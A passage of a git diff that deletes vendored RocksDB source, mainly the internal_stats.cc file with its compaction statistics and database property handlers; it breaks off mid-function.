-  std::string path = rocksdb::test::TmpDir() + "/forward_iterator_test";
-  fprintf(stderr, "db path is %s\n", path.c_str());
-  rocksdb::Options options;
-  options.create_if_missing = true;
-  options.compression = rocksdb::CompressionType::kNoCompression;
-  options.compaction_style = rocksdb::CompactionStyle::kCompactionStyleNone;
-  options.level0_slowdown_writes_trigger = 99999;
-  options.level0_stop_writes_trigger = 99999;
-  options.use_direct_io_for_flush_and_compaction = true;
-  options.write_buffer_size = FLAGS_memtable_size;
-  rocksdb::BlockBasedTableOptions table_options;
-  table_options.block_cache = rocksdb::NewLRUCache(FLAGS_block_cache_size);
-  table_options.block_size = FLAGS_block_size;
-  options.table_factory.reset(
-      rocksdb::NewBlockBasedTableFactory(table_options));
-
-  status = rocksdb::DestroyDB(path, options);
-  assert(status.ok());
-  rocksdb::DB* db_raw;
-  status = rocksdb::DB::Open(options, path, &db_raw);
-  assert(status.ok());
-  std::unique_ptr<rocksdb::DB> db(db_raw);
-
-  std::vector<ShardState> shard_states(FLAGS_shards + 1);
-  std::deque<Reader> readers;
-  while (static_cast<int>(readers.size()) < FLAGS_readers) {
-    readers.emplace_back(&shard_states, db_raw);
-  }
-  std::deque<Writer> writers;
-  while (static_cast<int>(writers.size()) < FLAGS_writers) {
-    writers.emplace_back(&shard_states, db_raw);
-  }
-
-  // Each shard gets a random reader and random writer assigned to it
-  for (int i = 1; i <= FLAGS_shards; ++i) {
-    std::uniform_int_distribution<int> reader_dist(0, FLAGS_readers - 1);
-    std::uniform_int_distribution<int> writer_dist(0, FLAGS_writers - 1);
-    shard_states[i].reader = &readers[reader_dist(rng)];
-    shard_states[i].writer = &writers[writer_dist(rng)];
-  }
-
-  StatsThread stats_thread(db_raw);
-  for (Writer& w : writers) {
-    w.start();
-  }
-
-  writers.clear();
-  readers.clear();
-}
-#endif  // !defined(GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/db/internal_stats.cc b/thirdparty/rocksdb/db/internal_stats.cc
deleted file mode 100644
index e98bd98..0000000
--- a/thirdparty/rocksdb/db/internal_stats.cc
+++ /dev/null
@@ -1,1210 +0,0 @@
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/internal_stats.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-#include "db/column_family.h"
-
-#include "db/db_impl.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-const std::map<LevelStatType, LevelStat> InternalStats::compaction_level_stats =
-    {
-        {LevelStatType::NUM_FILES, LevelStat{"NumFiles", "Files"}},
-        {LevelStatType::COMPACTED_FILES,
-         LevelStat{"CompactedFiles", "CompactedFiles"}},
-        {LevelStatType::SIZE_BYTES, LevelStat{"SizeBytes", "Size"}},
-        {LevelStatType::SCORE, LevelStat{"Score", "Score"}},
-        {LevelStatType::READ_GB, LevelStat{"ReadGB", "Read(GB)"}},
-        {LevelStatType::RN_GB, LevelStat{"RnGB", "Rn(GB)"}},
-        {LevelStatType::RNP1_GB, LevelStat{"Rnp1GB", "Rnp1(GB)"}},
-        {LevelStatType::WRITE_GB, LevelStat{"WriteGB", "Write(GB)"}},
-        {LevelStatType::W_NEW_GB, LevelStat{"WnewGB", "Wnew(GB)"}},
-        {LevelStatType::MOVED_GB, LevelStat{"MovedGB", "Moved(GB)"}},
-        {LevelStatType::WRITE_AMP, LevelStat{"WriteAmp", "W-Amp"}},
-        {LevelStatType::READ_MBPS, LevelStat{"ReadMBps", "Rd(MB/s)"}},
-        {LevelStatType::WRITE_MBPS, LevelStat{"WriteMBps", "Wr(MB/s)"}},
-        {LevelStatType::COMP_SEC, LevelStat{"CompSec", "Comp(sec)"}},
-        {LevelStatType::COMP_COUNT, LevelStat{"CompCount", "Comp(cnt)"}},
-        {LevelStatType::AVG_SEC, LevelStat{"AvgSec", "Avg(sec)"}},
-        {LevelStatType::KEY_IN, LevelStat{"KeyIn", "KeyIn"}},
-        {LevelStatType::KEY_DROP, LevelStat{"KeyDrop", "KeyDrop"}},
-};
-
-namespace {
-const double kMB = 1048576.0;
-const double kGB = kMB * 1024;
-const double kMicrosInSec = 1000000.0;
-
-void PrintLevelStatsHeader(char* buf, size_t len, const std::string& cf_name) {
-  int written_size =
-      snprintf(buf, len, "\n** Compaction Stats [%s] **\n", cf_name.c_str());
-  auto hdr = [](LevelStatType t) {
-    return InternalStats::compaction_level_stats.at(t).header_name.c_str();
-  };
-  int line_size = snprintf(
-      buf + written_size, len - written_size,
-      "Level    %s   %s     %s %s  %s %s %s %s %s %s %s %s %s %s %s %s %s\n",
-      // Note that we skip COMPACTED_FILES and merge it with Files column
-      hdr(LevelStatType::NUM_FILES), hdr(LevelStatType::SIZE_BYTES),
-      hdr(LevelStatType::SCORE), hdr(LevelStatType::READ_GB),
-      hdr(LevelStatType::RN_GB), hdr(LevelStatType::RNP1_GB),
-      hdr(LevelStatType::WRITE_GB), hdr(LevelStatType::W_NEW_GB),
-      hdr(LevelStatType::MOVED_GB), hdr(LevelStatType::WRITE_AMP),
-      hdr(LevelStatType::READ_MBPS), hdr(LevelStatType::WRITE_MBPS),
-      hdr(LevelStatType::COMP_SEC), hdr(LevelStatType::COMP_COUNT),
-      hdr(LevelStatType::AVG_SEC), hdr(LevelStatType::KEY_IN),
-      hdr(LevelStatType::KEY_DROP));
-
-  written_size += line_size;
-  snprintf(buf + written_size, len - written_size, "%s\n",
-           std::string(line_size, '-').c_str());
-}
-
-void PrepareLevelStats(std::map<LevelStatType, double>* level_stats,
-                       int num_files, int being_compacted,
-                       double total_file_size, double score, double w_amp,
-                       const InternalStats::CompactionStats& stats) {
-  uint64_t bytes_read =
-      stats.bytes_read_non_output_levels + stats.bytes_read_output_level;
-  int64_t bytes_new =
-      stats.bytes_written - stats.bytes_read_output_level;
-  double elapsed = (stats.micros + 1) / kMicrosInSec;
-
-  (*level_stats)[LevelStatType::NUM_FILES] = num_files;
-  (*level_stats)[LevelStatType::COMPACTED_FILES] = being_compacted;
-  (*level_stats)[LevelStatType::SIZE_BYTES] = total_file_size;
-  (*level_stats)[LevelStatType::SCORE] = score;
-  (*level_stats)[LevelStatType::READ_GB] = bytes_read / kGB;
-  (*level_stats)[LevelStatType::RN_GB] =
-      stats.bytes_read_non_output_levels / kGB;
-  (*level_stats)[LevelStatType::RNP1_GB] = stats.bytes_read_output_level / kGB;
-  (*level_stats)[LevelStatType::WRITE_GB] = stats.bytes_written / kGB;
-  (*level_stats)[LevelStatType::W_NEW_GB] = bytes_new / kGB;
-  (*level_stats)[LevelStatType::MOVED_GB] = stats.bytes_moved / kGB;
-  (*level_stats)[LevelStatType::WRITE_AMP] = w_amp;
-  (*level_stats)[LevelStatType::READ_MBPS] = bytes_read / kMB / elapsed;
-  (*level_stats)[LevelStatType::WRITE_MBPS] =
-      stats.bytes_written / kMB / elapsed;
-  (*level_stats)[LevelStatType::COMP_SEC] = stats.micros / kMicrosInSec;
-  (*level_stats)[LevelStatType::COMP_COUNT] = stats.count;
-  (*level_stats)[LevelStatType::AVG_SEC] =
-      stats.count == 0 ? 0 : stats.micros / kMicrosInSec / stats.count;
-  (*level_stats)[LevelStatType::KEY_IN] =
-      static_cast<double>(stats.num_input_records);
-  (*level_stats)[LevelStatType::KEY_DROP] =
-      static_cast<double>(stats.num_dropped_records);
-}
-
-void PrintLevelStats(char* buf, size_t len, const std::string& name,
-                     const std::map<LevelStatType, double>& stat_value) {
-  snprintf(buf, len,
-           "%4s "      /*  Level */
-           "%6d/%-3d " /*  Files */
-           "%8s "      /*  Size */
-           "%5.1f "    /*  Score */
-           "%8.1f "    /*  Read(GB) */
-           "%7.1f "    /*  Rn(GB) */
-           "%8.1f "    /*  Rnp1(GB) */
-           "%9.1f "    /*  Write(GB) */
-           "%8.1f "    /*  Wnew(GB) */
-           "%9.1f "    /*  Moved(GB) */
-           "%5.1f "    /*  W-Amp */
-           "%8.1f "    /*  Rd(MB/s) */
-           "%8.1f "    /*  Wr(MB/s) */
-           "%9.0f "    /*  Comp(sec) */
-           "%9d "      /*  Comp(cnt) */
-           "%8.3f "    /*  Avg(sec) */
-           "%7s "      /*  KeyIn */
-           "%6s\n",    /*  KeyDrop */
-           name.c_str(),
-           static_cast<int>(stat_value.at(LevelStatType::NUM_FILES)),
-           static_cast<int>(stat_value.at(LevelStatType::COMPACTED_FILES)),
-           BytesToHumanString(
-               static_cast<uint64_t>(stat_value.at(LevelStatType::SIZE_BYTES)))
-               .c_str(),
-           stat_value.at(LevelStatType::SCORE),
-           stat_value.at(LevelStatType::READ_GB),
-           stat_value.at(LevelStatType::RN_GB),
-           stat_value.at(LevelStatType::RNP1_GB),
-           stat_value.at(LevelStatType::WRITE_GB),
-           stat_value.at(LevelStatType::W_NEW_GB),
-           stat_value.at(LevelStatType::MOVED_GB),
-           stat_value.at(LevelStatType::WRITE_AMP),
-           stat_value.at(LevelStatType::READ_MBPS),
-           stat_value.at(LevelStatType::WRITE_MBPS),
-           stat_value.at(LevelStatType::COMP_SEC),
-           static_cast<int>(stat_value.at(LevelStatType::COMP_COUNT)),
-           stat_value.at(LevelStatType::AVG_SEC),
-           NumberToHumanString(
-               static_cast<std::int64_t>(stat_value.at(LevelStatType::KEY_IN)))
-               .c_str(),
-           NumberToHumanString(static_cast<std::int64_t>(
-                                   stat_value.at(LevelStatType::KEY_DROP)))
-               .c_str());
-}
-
-void PrintLevelStats(char* buf, size_t len, const std::string& name,
-                     int num_files, int being_compacted, double total_file_size,
-                     double score, double w_amp,
-                     const InternalStats::CompactionStats& stats) {
-  std::map<LevelStatType, double> level_stats;
-  PrepareLevelStats(&level_stats, num_files, being_compacted, total_file_size,
-                    score, w_amp, stats);
-  PrintLevelStats(buf, len, name, level_stats);
-}
-
-// Assumes that trailing numbers represent an optional argument. This requires
-// property names to not end with numbers.
-std::pair<Slice, Slice> GetPropertyNameAndArg(const Slice& property) {
-  Slice name = property, arg = property;
-  size_t sfx_len = 0;
-  while (sfx_len < property.size() &&
-         isdigit(property[property.size() - sfx_len - 1])) {
-    ++sfx_len;
-  }
-  name.remove_suffix(sfx_len);
-  arg.remove_prefix(property.size() - sfx_len);
-  return {name, arg};
-}
-}  // anonymous namespace
-
-static const std::string rocksdb_prefix = "rocksdb.";
-
-static const std::string num_files_at_level_prefix = "num-files-at-level";
-static const std::string compression_ratio_at_level_prefix =
-    "compression-ratio-at-level";
-static const std::string allstats = "stats";
-static const std::string sstables = "sstables";
-static const std::string cfstats = "cfstats";
-static const std::string cfstats_no_file_histogram =
-    "cfstats-no-file-histogram";
-static const std::string cf_file_histogram = "cf-file-histogram";
-static const std::string dbstats = "dbstats";
-static const std::string levelstats = "levelstats";
-static const std::string num_immutable_mem_table = "num-immutable-mem-table";
-static const std::string num_immutable_mem_table_flushed =
-    "num-immutable-mem-table-flushed";
-static const std::string mem_table_flush_pending = "mem-table-flush-pending";
-static const std::string compaction_pending = "compaction-pending";
-static const std::string background_errors = "background-errors";
-static const std::string cur_size_active_mem_table =
-                          "cur-size-active-mem-table";
-static const std::string cur_size_all_mem_tables = "cur-size-all-mem-tables";
-static const std::string size_all_mem_tables = "size-all-mem-tables";
-static const std::string num_entries_active_mem_table =
-                          "num-entries-active-mem-table";
-static const std::string num_entries_imm_mem_tables =
-                          "num-entries-imm-mem-tables";
-static const std::string num_deletes_active_mem_table =
-                          "num-deletes-active-mem-table";
-static const std::string num_deletes_imm_mem_tables =
-                          "num-deletes-imm-mem-tables";
-static const std::string estimate_num_keys = "estimate-num-keys";
-static const std::string estimate_table_readers_mem =
-                          "estimate-table-readers-mem";
-static const std::string is_file_deletions_enabled =
-                          "is-file-deletions-enabled";
-static const std::string num_snapshots = "num-snapshots";
-static const std::string oldest_snapshot_time = "oldest-snapshot-time";
-static const std::string num_live_versions = "num-live-versions";
-static const std::string current_version_number =
-    "current-super-version-number";
-static const std::string estimate_live_data_size = "estimate-live-data-size";
-static const std::string min_log_number_to_keep = "min-log-number-to-keep";
-static const std::string base_level = "base-level";
-static const std::string total_sst_files_size = "total-sst-files-size";
-static const std::string estimate_pending_comp_bytes =
-    "estimate-pending-compaction-bytes";
-static const std::string aggregated_table_properties =
-    "aggregated-table-properties";
-static const std::string aggregated_table_properties_at_level =
-    aggregated_table_properties + "-at-level";
-static const std::string num_running_compactions = "num-running-compactions";
-static const std::string num_running_flushes = "num-running-flushes";
-static const std::string actual_delayed_write_rate =
-    "actual-delayed-write-rate";
-static const std::string is_write_stopped = "is-write-stopped";
-static const std::string estimate_oldest_key_time = "estimate-oldest-key-time";
-
-const std::string DB::Properties::kNumFilesAtLevelPrefix =
-                      rocksdb_prefix + num_files_at_level_prefix;
-const std::string DB::Properties::kCompressionRatioAtLevelPrefix =
-                      rocksdb_prefix + compression_ratio_at_level_prefix;
-const std::string DB::Properties::kStats = rocksdb_prefix + allstats;
-const std::string DB::Properties::kSSTables = rocksdb_prefix + sstables;
-const std::string DB::Properties::kCFStats = rocksdb_prefix + cfstats;
-const std::string DB::Properties::kCFStatsNoFileHistogram =
-    rocksdb_prefix + cfstats_no_file_histogram;
-const std::string DB::Properties::kCFFileHistogram =
-    rocksdb_prefix + cf_file_histogram;
-const std::string DB::Properties::kDBStats = rocksdb_prefix + dbstats;
-const std::string DB::Properties::kLevelStats = rocksdb_prefix + levelstats;
-const std::string DB::Properties::kNumImmutableMemTable =
-                      rocksdb_prefix + num_immutable_mem_table;
-const std::string DB::Properties::kNumImmutableMemTableFlushed =
-    rocksdb_prefix + num_immutable_mem_table_flushed;
-const std::string DB::Properties::kMemTableFlushPending =
-                      rocksdb_prefix + mem_table_flush_pending;
-const std::string DB::Properties::kCompactionPending =
-                      rocksdb_prefix + compaction_pending;
-const std::string DB::Properties::kNumRunningCompactions =
-    rocksdb_prefix + num_running_compactions;
-const std::string DB::Properties::kNumRunningFlushes =
-    rocksdb_prefix + num_running_flushes;
-const std::string DB::Properties::kBackgroundErrors =
-                      rocksdb_prefix + background_errors;
-const std::string DB::Properties::kCurSizeActiveMemTable =
-                      rocksdb_prefix + cur_size_active_mem_table;
-const std::string DB::Properties::kCurSizeAllMemTables =
-    rocksdb_prefix + cur_size_all_mem_tables;
-const std::string DB::Properties::kSizeAllMemTables =
-    rocksdb_prefix + size_all_mem_tables;
-const std::string DB::Properties::kNumEntriesActiveMemTable =
-                      rocksdb_prefix + num_entries_active_mem_table;
-const std::string DB::Properties::kNumEntriesImmMemTables =
-                      rocksdb_prefix + num_entries_imm_mem_tables;
-const std::string DB::Properties::kNumDeletesActiveMemTable =
-                      rocksdb_prefix + num_deletes_active_mem_table;
-const std::string DB::Properties::kNumDeletesImmMemTables =
-                      rocksdb_prefix + num_deletes_imm_mem_tables;
-const std::string DB::Properties::kEstimateNumKeys =
-                      rocksdb_prefix + estimate_num_keys;
-const std::string DB::Properties::kEstimateTableReadersMem =
-                      rocksdb_prefix + estimate_table_readers_mem;
-const std::string DB::Properties::kIsFileDeletionsEnabled =
-                      rocksdb_prefix + is_file_deletions_enabled;
-const std::string DB::Properties::kNumSnapshots =
-                      rocksdb_prefix + num_snapshots;
-const std::string DB::Properties::kOldestSnapshotTime =
-                      rocksdb_prefix + oldest_snapshot_time;
-const std::string DB::Properties::kNumLiveVersions =
-                      rocksdb_prefix + num_live_versions;
-const std::string DB::Properties::kCurrentSuperVersionNumber =
-    rocksdb_prefix + current_version_number;
-const std::string DB::Properties::kEstimateLiveDataSize =
-                      rocksdb_prefix + estimate_live_data_size;
-const std::string DB::Properties::kMinLogNumberToKeep =
-    rocksdb_prefix + min_log_number_to_keep;
-const std::string DB::Properties::kTotalSstFilesSize =
-                      rocksdb_prefix + total_sst_files_size;
-const std::string DB::Properties::kBaseLevel = rocksdb_prefix + base_level;
-const std::string DB::Properties::kEstimatePendingCompactionBytes =
-    rocksdb_prefix + estimate_pending_comp_bytes;
-const std::string DB::Properties::kAggregatedTableProperties =
-    rocksdb_prefix + aggregated_table_properties;
-const std::string DB::Properties::kAggregatedTablePropertiesAtLevel =
-    rocksdb_prefix + aggregated_table_properties_at_level;
-const std::string DB::Properties::kActualDelayedWriteRate =
-    rocksdb_prefix + actual_delayed_write_rate;
-const std::string DB::Properties::kIsWriteStopped =
-    rocksdb_prefix + is_write_stopped;
-const std::string DB::Properties::kEstimateOldestKeyTime =
-    rocksdb_prefix + estimate_oldest_key_time;
-
-const std::unordered_map<std::string, DBPropertyInfo>
-    InternalStats::ppt_name_to_info = {
-        {DB::Properties::kNumFilesAtLevelPrefix,
-         {false, &InternalStats::HandleNumFilesAtLevel, nullptr, nullptr}},
-        {DB::Properties::kCompressionRatioAtLevelPrefix,
-         {false, &InternalStats::HandleCompressionRatioAtLevelPrefix, nullptr,
-          nullptr}},
-        {DB::Properties::kLevelStats,
-         {false, &InternalStats::HandleLevelStats, nullptr, nullptr}},
-        {DB::Properties::kStats,
-         {false, &InternalStats::HandleStats, nullptr, nullptr}},
-        {DB::Properties::kCFStats,
-         {false, &InternalStats::HandleCFStats, nullptr,
-          &InternalStats::HandleCFMapStats}},
-        {DB::Properties::kCFStatsNoFileHistogram,
-         {false, &InternalStats::HandleCFStatsNoFileHistogram, nullptr,
-          nullptr}},
-        {DB::Properties::kCFFileHistogram,
-         {false, &InternalStats::HandleCFFileHistogram, nullptr, nullptr}},
-        {DB::Properties::kDBStats,
-         {false, &InternalStats::HandleDBStats, nullptr, nullptr}},
-        {DB::Properties::kSSTables,
-         {false, &InternalStats::HandleSsTables, nullptr, nullptr}},
-        {DB::Properties::kAggregatedTableProperties,
-         {false, &InternalStats::HandleAggregatedTableProperties, nullptr,
-          nullptr}},
-        {DB::Properties::kAggregatedTablePropertiesAtLevel,
-         {false, &InternalStats::HandleAggregatedTablePropertiesAtLevel,
-          nullptr, nullptr}},
-        {DB::Properties::kNumImmutableMemTable,
-         {false, nullptr, &InternalStats::HandleNumImmutableMemTable, nullptr}},
-        {DB::Properties::kNumImmutableMemTableFlushed,
-         {false, nullptr, &InternalStats::HandleNumImmutableMemTableFlushed,
-          nullptr}},
-        {DB::Properties::kMemTableFlushPending,
-         {false, nullptr, &InternalStats::HandleMemTableFlushPending, nullptr}},
-        {DB::Properties::kCompactionPending,
-         {false, nullptr, &InternalStats::HandleCompactionPending, nullptr}},
-        {DB::Properties::kBackgroundErrors,
-         {false, nullptr, &InternalStats::HandleBackgroundErrors, nullptr}},
-        {DB::Properties::kCurSizeActiveMemTable,
-         {false, nullptr, &InternalStats::HandleCurSizeActiveMemTable,
-          nullptr}},
-        {DB::Properties::kCurSizeAllMemTables,
-         {false, nullptr, &InternalStats::HandleCurSizeAllMemTables, nullptr}},
-        {DB::Properties::kSizeAllMemTables,
-         {false, nullptr, &InternalStats::HandleSizeAllMemTables, nullptr}},
-        {DB::Properties::kNumEntriesActiveMemTable,
-         {false, nullptr, &InternalStats::HandleNumEntriesActiveMemTable,
-          nullptr}},
-        {DB::Properties::kNumEntriesImmMemTables,
-         {false, nullptr, &InternalStats::HandleNumEntriesImmMemTables,
-          nullptr}},
-        {DB::Properties::kNumDeletesActiveMemTable,
-         {false, nullptr, &InternalStats::HandleNumDeletesActiveMemTable,
-          nullptr}},
-        {DB::Properties::kNumDeletesImmMemTables,
-         {false, nullptr, &InternalStats::HandleNumDeletesImmMemTables,
-          nullptr}},
-        {DB::Properties::kEstimateNumKeys,
-         {false, nullptr, &InternalStats::HandleEstimateNumKeys, nullptr}},
-        {DB::Properties::kEstimateTableReadersMem,
-         {true, nullptr, &InternalStats::HandleEstimateTableReadersMem,
-          nullptr}},
-        {DB::Properties::kIsFileDeletionsEnabled,
-         {false, nullptr, &InternalStats::HandleIsFileDeletionsEnabled,
-          nullptr}},
-        {DB::Properties::kNumSnapshots,
-         {false, nullptr, &InternalStats::HandleNumSnapshots, nullptr}},
-        {DB::Properties::kOldestSnapshotTime,
-         {false, nullptr, &InternalStats::HandleOldestSnapshotTime, nullptr}},
-        {DB::Properties::kNumLiveVersions,
-         {false, nullptr, &InternalStats::HandleNumLiveVersions, nullptr}},
-        {DB::Properties::kCurrentSuperVersionNumber,
-         {false, nullptr, &InternalStats::HandleCurrentSuperVersionNumber,
-          nullptr}},
-        {DB::Properties::kEstimateLiveDataSize,
-         {true, nullptr, &InternalStats::HandleEstimateLiveDataSize, nullptr}},
-        {DB::Properties::kMinLogNumberToKeep,
-         {false, nullptr, &InternalStats::HandleMinLogNumberToKeep, nullptr}},
-        {DB::Properties::kBaseLevel,
-         {false, nullptr, &InternalStats::HandleBaseLevel, nullptr}},
-        {DB::Properties::kTotalSstFilesSize,
-         {false, nullptr, &InternalStats::HandleTotalSstFilesSize, nullptr}},
-        {DB::Properties::kEstimatePendingCompactionBytes,
-         {false, nullptr, &InternalStats::HandleEstimatePendingCompactionBytes,
-          nullptr}},
-        {DB::Properties::kNumRunningFlushes,
-         {false, nullptr, &InternalStats::HandleNumRunningFlushes, nullptr}},
-        {DB::Properties::kNumRunningCompactions,
-         {false, nullptr, &InternalStats::HandleNumRunningCompactions,
-          nullptr}},
-        {DB::Properties::kActualDelayedWriteRate,
-         {false, nullptr, &InternalStats::HandleActualDelayedWriteRate,
-          nullptr}},
-        {DB::Properties::kIsWriteStopped,
-         {false, nullptr, &InternalStats::HandleIsWriteStopped, nullptr}},
-        {DB::Properties::kEstimateOldestKeyTime,
-         {false, nullptr, &InternalStats::HandleEstimateOldestKeyTime,
-          nullptr}},
-};
-
-const DBPropertyInfo* GetPropertyInfo(const Slice& property) {
-  std::string ppt_name = GetPropertyNameAndArg(property).first.ToString();
-  auto ppt_info_iter = InternalStats::ppt_name_to_info.find(ppt_name);
-  if (ppt_info_iter == InternalStats::ppt_name_to_info.end()) {
-    return nullptr;
-  }
-  return &ppt_info_iter->second;
-}
-
-bool InternalStats::GetStringProperty(const DBPropertyInfo& property_info,
-                                      const Slice& property,
-                                      std::string* value) {
-  assert(value != nullptr);
-  assert(property_info.handle_string != nullptr);
-  Slice arg = GetPropertyNameAndArg(property).second;
-  return (this->*(property_info.handle_string))(value, arg);
-}
-
-bool InternalStats::GetMapProperty(const DBPropertyInfo& property_info,
-                                   const Slice& property,
-                                   std::map<std::string, double>* value) {
-  assert(value != nullptr);
-  assert(property_info.handle_map != nullptr);
-  return (this->*(property_info.handle_map))(value);
-}
-
-bool InternalStats::GetIntProperty(const DBPropertyInfo& property_info,
-                                   uint64_t* value, DBImpl* db) {
-  assert(value != nullptr);
-  assert(property_info.handle_int != nullptr &&
-         !property_info.need_out_of_mutex);
-  db->mutex_.AssertHeld();
-  return (this->*(property_info.handle_int))(value, db, nullptr /* version */);
-}
-
-bool InternalStats::GetIntPropertyOutOfMutex(
-    const DBPropertyInfo& property_info, Version* version, uint64_t* value) {
-  assert(value != nullptr);
-  assert(property_info.handle_int != nullptr &&
-         property_info.need_out_of_mutex);
-  return (this->*(property_info.handle_int))(value, nullptr /* db */, version);
-}
-
-bool InternalStats::HandleNumFilesAtLevel(std::string* value, Slice suffix) {
-  uint64_t level;
-  const auto* vstorage = cfd_->current()->storage_info();
-  bool ok = ConsumeDecimalNumber(&suffix, &level) && suffix.empty();
-  if (!ok || static_cast<int>(level) >= number_levels_) {
-    return false;
-  } else {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%d",
-             vstorage->NumLevelFiles(static_cast<int>(level)));
-    *value = buf;
-    return true;
-  }
-}
-
-bool InternalStats::HandleCompressionRatioAtLevelPrefix(std::string* value,
-                                                        Slice suffix) {
-  uint64_t level;
-  const auto* vstorage = cfd_->current()->storage_info();
-  bool ok = ConsumeDecimalNumber(&suffix, &level) && suffix.empty();
-  if (!ok || level >= static_cast<uint64_t>(number_levels_)) {
-    return false;
-  }
-  *value = ToString(
-      vstorage->GetEstimatedCompressionRatioAtLevel(static_cast<int>(level)));
-  return true;
-}
-
-bool InternalStats::HandleLevelStats(std::string* value, Slice suffix) {
-  char buf[1000];
-  const auto* vstorage = cfd_->current()->storage_info();
-  snprintf(buf, sizeof(buf),
-           "Level Files Size(MB)\n"
-           "--------------------\n");
-  value->append(buf);
-
-  for (int level = 0; level < number_levels_; level++) {
-    snprintf(buf, sizeof(buf), "%3d %8d %8.0f\n", level,
-             vstorage->NumLevelFiles(level),
-             vstorage->NumLevelBytes(level) / kMB);
-    value->append(buf);
-  }
-  return true;
-}
-
-bool InternalStats::HandleStats(std::string* value, Slice suffix) {
-  if (!HandleCFStats(value, suffix)) {
-    return false;
-  }
-  if (!HandleDBStats(value, suffix)) {
-    return false;
-  }
-  return true;
-}
-
-bool InternalStats::HandleCFMapStats(std::map<std::string, double>* cf_stats) {
-  DumpCFMapStats(cf_stats);
-  return true;
-}
-
-bool InternalStats::HandleCFStats(std::string* value, Slice suffix) {
-  DumpCFStats(value);
-  return true;
-}
-
-bool InternalStats::HandleCFStatsNoFileHistogram(std::string* value,
-                                                 Slice suffix) {
-  DumpCFStatsNoFileHistogram(value);
-  return true;
-}
-
-bool InternalStats::HandleCFFileHistogram(std::string* value, Slice suffix) {
-  DumpCFFileHistogram(value);
-  return true;
-}
-
-bool InternalStats::HandleDBStats(std::string* value, Slice suffix) {
-  DumpDBStats(value);
-  return true;
-}
-
-bool InternalStats::HandleSsTables(std::string* value, Slice suffix) {
-  auto* current = cfd_->current();
-  *value = current->DebugString(true, true);
-  return true;
-}
-
-bool InternalStats::HandleAggregatedTableProperties(std::string* value,
-                                                    Slice suffix) {
-  std::shared_ptr<const TableProperties> tp;
-  auto s = cfd_->current()->GetAggregatedTableProperties(&tp);
-  if (!s.ok()) {
-    return false;
-  }
-  *value = tp->ToString();
-  return true;
-}
-
-bool InternalStats::HandleAggregatedTablePropertiesAtLevel(std::string* value,
-                                                           Slice suffix) {
-  uint64_t level;
-  bool ok = ConsumeDecimalNumber(&suffix, &level) && suffix.empty();
-  if (!ok || static_cast<int>(level) >= number_levels_) {
-    return false;
-  }
-  std::shared_ptr<const TableProperties> tp;
-  auto s = cfd_->current()->GetAggregatedTableProperties(
-      &tp, static_cast<int>(level));
-  if (!s.ok()) {
-    return false;
-  }
-  *value = tp->ToString();
-  return true;
-}
-
-bool InternalStats::HandleNumImmutableMemTable(uint64_t* value, DBImpl* db,
-                                               Version* version) {
-  *value = cfd_->imm()->NumNotFlushed();
-  return true;
-}
-
-bool InternalStats::HandleNumImmutableMemTableFlushed(uint64_t* value,
-                                                      DBImpl* db,
-                                                      Version* version) {
-  *value = cfd_->imm()->NumFlushed();
-  return true;
-}
-
-bool InternalStats::HandleMemTableFlushPending(uint64_t* value, DBImpl* db,
-                                               Version* version) {
-  // Return number of mem tables that are ready to flush (made immutable)
-  *value = (cfd_->imm()->IsFlushPending() ? 1 : 0);
-  return true;
-}
-
-bool InternalStats::HandleNumRunningFlushes(uint64_t* value, DBImpl* db,
-                                            Version* version) {
-  *value = db->num_running_flushes();
-  return true;
-}
-
-bool InternalStats::HandleCompactionPending(uint64_t* value, DBImpl* db,
-                                            Version* version) {
-  // 1 if the system already determines at least one compaction is needed.
-  // 0 otherwise,
-  const auto* vstorage = cfd_->current()->storage_info();
-  *value = (cfd_->compaction_picker()->NeedsCompaction(vstorage) ? 1 : 0);
-  return true;
-}
-
-bool InternalStats::HandleNumRunningCompactions(uint64_t* value, DBImpl* db,
-                                                Version* version) {
-  *value = db->num_running_compactions_;
-  return true;
-}
-
-bool InternalStats::HandleBackgroundErrors(uint64_t* value, DBImpl* db,
-                                           Version* version) {
-  // Accumulated number of  errors in background flushes or compactions.
-  *value = GetBackgroundErrorCount();
-  return true;
-}
-
-bool InternalStats::HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db,
-                                                Version* version) {
-  // Current size of the active memtable
-  *value = cfd_->mem()->ApproximateMemoryUsage();
-  return true;
-}
-
-bool InternalStats::HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db,
-                                              Version* version) {
-  // Current size of the active memtable + immutable memtables
-  *value = cfd_->mem()->ApproximateMemoryUsage() +
-           cfd_->imm()->ApproximateUnflushedMemTablesMemoryUsage();
-  return true;
-}
-
-bool InternalStats::HandleSizeAllMemTables(uint64_t* value, DBImpl* db,
-                                           Version* version) {
-  *value = cfd_->mem()->ApproximateMemoryUsage() +
-           cfd_->imm()->ApproximateMemoryUsage();
-  return true;
-}
-
-bool InternalStats::HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db,
-                                                   Version* version) {
-  // Current number of entires in the active memtable
-  *value = cfd_->mem()->num_entries();
-  return true;
-}
-
-bool InternalStats::HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  // Current number of entries in the immutable memtables
-  *value = cfd_->imm()->current()->GetTotalNumEntries();
-  return true;
-}
-
-bool InternalStats::HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db,
-                                                   Version* version) {
-  // Current number of entires in the active memtable
-  *value = cfd_->mem()->num_deletes();
-  return true;
-}
-
-bool InternalStats::HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db,
-                                                 Version* version) {
-  // Current number of entries in the immutable memtables
-  *value = cfd_->imm()->current()->GetTotalNumDeletes();
-  return true;
-}
-
-bool InternalStats::HandleEstimateNumKeys(uint64_t* value, DBImpl* db,
-                                          Version* version) {
-  // Estimate number of entries in the column family:
-  // Use estimated entries in tables + total entries in memtables.
-  const auto* vstorage = cfd_->current()->storage_info();
